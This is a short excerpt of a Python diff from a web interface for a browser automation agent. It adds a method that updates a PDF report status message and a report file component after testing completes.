# Note: load_save_config component was removed from the interface
|
| 129 |
+
yield update_components
|
| 130 |
+
|
| 131 |
+
def update_pdf_report_status(self, report_path: Optional[str] = None, status_message: str = "Report will be generated automatically after testing completion"):
|
| 132 |
+
"""Update the PDF report status and file."""
|
| 133 |
+
update_components = {}
|
| 134 |
+
|
| 135 |
+
# Update report status
|
| 136 |
+
if "browser_use_agent.auto_report_status" in self.id_to_component:
|
| 137 |
+
status_comp = self.id_to_component["browser_use_agent.auto_report_status"]
|
| 138 |
+
update_components[status_comp] = status_comp.__class__(value=status_message)
|
| 139 |
+
|
| 140 |
+
# Update report file if path is provided
|
| 141 |
+
if report_path and "browser_use_agent.auto_pdf_report" in self.id_to_component:
|
| 142 |
+
report_comp = self.id_to_component["browser_use_agent.auto_pdf_report"]
|
| 143 |
+
update_components[report_comp] = report_comp.__class__(value=report_path, visible=True)
|
| 144 |
+
self.bu_last_pdf_report = report_path
|
| 145 |
+
|
| 146 |
+
return update_components
|